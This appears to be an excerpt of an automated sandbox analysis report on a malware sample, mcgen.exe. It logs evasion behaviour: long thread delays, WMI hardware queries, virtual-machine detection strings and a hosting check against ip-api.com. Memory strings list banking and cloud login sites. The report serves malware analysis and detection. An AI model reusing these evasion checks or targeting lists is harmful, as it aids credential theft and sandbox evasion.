              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8270Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1018Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8808Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 592Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3409
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 863
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3542
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3923
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1380
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2769
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2746
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1238
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2678
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1493
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18101
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep count: 8270 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep count: 1018 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 8808 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832Thread sleep count: 592 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 3409 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 524Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 268 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5920Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 863 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792Thread sleep count: 3923 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792Thread sleep count: 1380 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep count: 2769 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 309 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 2746 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 1238 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4512Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 2678 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 1493 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6B9F183B0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F192F0 FindFirstFileExW,FindClose,0_2_00007FF6B9F192F0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6B9F318E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,103_2_00007FF695CF46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D388E0 FindFirstFileExA,103_2_00007FF695D388E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,103_2_00007FF695CEE21C
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940E1240 GetSystemInfo,2_2_00007FFD940E1240
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: getmac.exe, 0000004C.00000002.2290526325.0000022C192C7000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287247169.0000022C192C5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287859441.0000022C192C6000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C1929B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: getmac.exe, 0000004C.00000002.2290526325.0000022C192C7000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287247169.0000022C192C5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287859441.0000022C192C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: mcgen.exe, 00000002.00000002.2525689831.000002C54E090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HgfS_IFCHR
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 6dbf5vmware
              Source: getmac.exe, 0000004C.00000003.2287247169.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000002.2290374509.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C1929B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"t
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f01vmsrvc
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
